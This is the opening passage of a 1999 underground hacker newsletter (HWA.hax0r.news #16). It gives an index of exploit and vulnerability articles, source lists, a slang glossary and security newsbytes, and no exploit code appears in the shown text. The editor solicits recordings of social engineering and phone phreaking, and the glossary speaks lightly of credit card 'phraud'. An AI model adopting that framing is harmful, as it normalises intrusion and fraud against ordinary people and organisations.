Copy Link
Add to Bookmark
Report
hwa-hn16
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 16 Volume 1 1999 May 1st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #16
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #16
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Telecardnews site, phone card and smartcard cracking.............
04.0 .. Coldfusion mole.cfm..............................................
05.0 .. More info on the CIH virus.......................................
06.0 .. E-Commerce is still taking it in the gnards......................
06.1 .. E-commerce boom fueling Security Holes?.........................
07.0 .. Anonymity guaranteed (PCworld)...................................
07.1 .. Anonymity guaranteed (Zero Knowledge Systems)....................
07.2 .. The ZKS white paper..............................................
08.0 .. Mitnick's accomplice Lewis DePayne, pleads guilty................
09.0 .. Biometric databases?.Not according to this report... ............
10.0 .. In the wake of CIH ..............................................
10.1 .. CIH 1.2 Virus Hits Few ..........................................
11.0 .. Lockdown2000 review by BHZ ......................................
12.0 .. ICQ99 Vulnerabilities and exploits...............................
12.1 .. ICQ Homepage Exploit.............................................
13.0 .. Possible DoS in WinNT RAS (PPTP).................................
14.0 .. MFT problem could cause you to reformat drive (NTFS).............
15.0 .. FireWalking a paper on determining Gateway Access Control Lists..
16.0 .. IGMP+8 fragmentation attack for Linux ...........................
17.0 .. local XFree 3.3.3 symlink root compromise..(freeBSD+others)......
18.0 .. Microsoft Outlook Express internet zone vulnerability............
19.0 .. Big Brother 1.09b/c security notice..............................
20.0 .. "Cyborg Seeks Community" by Steve Mann, wearable cpus anyone?....
20.1 .. :School For Cyborgs: By Steve Ditlea (sidebar to above article)..
21.0 .. Anonymizing UNIX systems white paper by van Hauser/THC...........
22.0 .. Ffingerd vulnerability...........................................
23.0 .. DoS in IRC services..............................................
24.0 .. New Java bug creates DoS for Win9x...............................
25.0 .. QPOP 2.4b2 _demo_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1
26.0 .. BSDI IMAP2BIS remote root exploit................................
27.0 .. Infod AIX exploit................................................
28.0 .. Cold fusion exploit scanner......................................
29.0 .. Updated CGI scanner scans for vulnerable servers scans 43 probs..
30.0 .. MS Outlook has potential reply-to spoofing vulnerability.........
31.0 .. Bash parsing vulnerability.......................................
32.0 .. NetBSD Security Advisory 1999-009................................
33.0 .. Explorer favicon.ico bug introduces new vulnerabilty.............
34.0 .. Cert: The Good Guys? (old boys network, reads like an ad for CERT)
35.0 .. NASA finds scapegoat? - Programmer indicted......................
36.0 .. CIH author found?................................................
37.0 .. INTEL goes after Zero Knowledge Systems..........................
38.0 .. NT-Exceed DoS....................................................
39.0 .. NT4 Trojaned Profiles............................................
40.0 .. Microsoft's web site virus haven! ...............................
41.0 .. New viruses from http://www.wopr.com.............................
42.0 .. Caldera COAS leaves shadow password file readable................
43.0 .. NT4+SP4 filename length vulnerabilty.............................
44.0 .. CSMMail Windows SMTP Server Remote Buffer Overflow Exploit.......
45.0 .. HP Sendmail 8.8.6 DoS............................................
46.0 .. KKI inactive connections advisory................................
47.0 .. How to achieve the status JP has with AntiOnline (from PacketStorm)
48.0 .. Windows thread overrun from a Java Applet........................
49.0 .. Phone Rangers break into GTE.....................................
50.0 .. Police question CIH virus creator................................
51.0 .. [ISN] The Virus Vault............................................
52.0 .. [ISN] The Bad Guys are Crackers..................................
53.0 .. [ISN] Email threats could bring down a 10yr jail term............
54.0 .. [ISN] Singapore ISP scans customer computers for vulnerabilities.
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
HOW.TO .. "How to hack" by our illustrious editor.........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD ..............................<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+........................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+........................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+........................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+........................<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net ech0 Security">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Free Keving demonstrations
From Project Gamma http://www.projectgamma.com/
April 30, 1999, 16:49
Author: WHiTe VaMPiRe
Demonstrations are being planned for Friday, June 4 in front of courthouses nationwide beginning at 2 PM to protest the unjust imprisonment
of Kevin Mitnick.
Kevin Mitnick has been held in a pre-trial facility since February 15, 1995, four years, without even a bail hearing. What did he do? Murder,
rape? No. He has been imprisoned for four years without even a bail hearing for possession of software allegedly worth millions of dollars.
However, the companies asserting this have never proven these claims nor have they reported these "losses" to their stockholders, as is
required by law.
Computer and legal experts agree that it is unlikely that any real damage occurred. The high numbers assume that every file and its associated
research were wiped from existence. In truth, no such damage was ever reported. Yet, Kevin Mitnick remains imprisoned as if this actually
happened.
Related links:
Free Kevin Demonstration
http://www.kevinmitnick.com/demo/index.html
Mitnick documents exposed (included in previous issues)
http://www.projectgamma.com/news/archive/1999/april/042499-1416.html
++ Possible Linuxconf Vulnerability (local console)
Approved-By: aleph1@UNDERGROUND.ORG
Date: Thu, 29 Apr 1999 18:45:40 -0400
Reply-To: The Nefarious Type <prestochango@ANTIONLINE.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: The Nefarious Type <prestochango@ANTIONLINE.COM>
Subject: Possible Linuxconf Vulnerability
To: BUGTRAQ@netspace.org
An older version of linuxconf was packaged with Redhat 5.1 and I had
not run into any problems with that version. But after installing the latest
version (linuxconf-1.13r15-1) onto OpenLinux 1.3, I came upon a problem during
boot. It had not detected /sbin/clock, so a menu appeared during boot and asked
if I wanted to change this. This happened all before I was even prompted for a
login.
The fact that someone who has physical access to the server can
access linuxconf (which by default, can only be used under root) is kind of
disturbing. So far, I have not been able to exploit this problem, though I'm
guessing that it could be done (e.g. from that menu, access user configuration,
etc.).
Linuxconf Homepage
http://www.solucorp.qc.ca/linuxconf/
-PrestoChango
++ Computer Student Wrote Chernobyl Virus to Humiliate Antivirus Providers
Contributed by Spikeman
Chen Ing-hau, a 24-year-old computer student, has been arrested in
Taiwan for creating the Chernobyl computer virus. Police said that Chen
may not be charged with a crime. If he did not intend to spread the
virus, he could avoid criminal charges, but if charged and convicted,
Chen faces up to three years in prison under Taiwanese law. The question
of civil liability still looms large for Chen, whose virus damaged
600,000 personal computers worldwide when it was triggered on April 26.
(The Boston Globe --
http://www.boston.com/dailynews2/120/economy/Computer_student_wrote_Chernob:.shtml)
++ NO COMMENT
From HNS http://www.net-security.org/
by BHZ, Friday 30th Apr 1999 on 3:36 pm CET
24.04.1999 Croatian Internet users were striking against HiNet, well known Croatian
monopolistic ISP. On that day all strike supporters didn't connect to the Internet.
HiNet didn't give any information or statistics about success or failing of our strike.
Yesterday some good (but not so good) news came. They will charge our telephone
impulses on local base (3 times cheaper then the "old" 077 number calls). OK, we
were happy that we have succeeded in one step of our plans, but chilling shocker
struck us. From 1st May prices of all telephone impulses will grow 30%. What could
we say about it? We will continue our protests in order to bring quality and price of
Croatian Internet connection to some western standards.
++ Summercon 99
(From HNN)
Contributed by Weld Pond
It is that time again. Presented by r00t and Phrack
Magazine Summercon99 will be held at the Omni Hotel,
part of the CNN Center in downtown Atlanta. Admission
is FREE (Feds and Press must pay) and everyone is
invited!
HNN Cons Page http://www.hackernews.com/cons/cons.html
++ On Packetstorm;
"The New Hacker's Dictionary v4.1.2" - The Jargon File is the definitive lexicon of Internet and hacker
slang, history, folklore, tradition, and humor. This is the latest
version (4.1.2), released on 4/28/99. Almost 10 MB of hacker jargon! By Eric Raymond.
http://www.Genocide2600.com/~tattooman/hacking-textfiles/jargon-4.1.2/ (Various formats)
++ Online banking system crashed
From www.403-security.org
http://www.403-security.org/Htmls/news.htm
By Astral 29.04.1999 12:13
Computer glitch is preventing lot of users to use CheckFree Holdings Corp. online bill payment systems using
programs such as MS.Money for accessing their accounts.Check Free spokesman sad that it isn't known when
system is going to be fixed and ready for using. For now about 350 banks cannot use online paying services
.Reason of this glitch ins't known yet, system could be hacked or just some technical problems.
Sorry no links for this story
++ Ministry Launches Cyber Attack?
From HNN http://www,hackernews.com/ April29th
contributed by sunny
The Ministry of Home Affairs in Singapore is being
accused of breaking into the personal computer of a
National University of Singapore law student. Ms Anne
Lee, 21, is claiming that her SingNet account was
broken into on 10 occasions in four days about two
weeks ago. According to a protection program called
Jammer, which was installed on the machine the IP
address of the attack belonged to the Ministry of Home
Affairs. The National Computer Board's assistant director
of IT security, Mr Goh Seow Hiong, said "It is very
difficult to change the IP address unless the person has
very sophisticated skills." (Bwahahahahahaha)
The Straits Times
http://straitstimes.asia1.com.sg/sin/sin2_0429.html
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
++ Ministry does scan machines
from HNN http://www.hackernews.com April 30th
contributed by Sunny
SingNet and SingTel Magix, two ISPs located in
Singapore, have admitted to asking the Home Affairs
Ministry's IT security unit to scan 200,000 of its
subscribers to see if their systems are vulnerable to
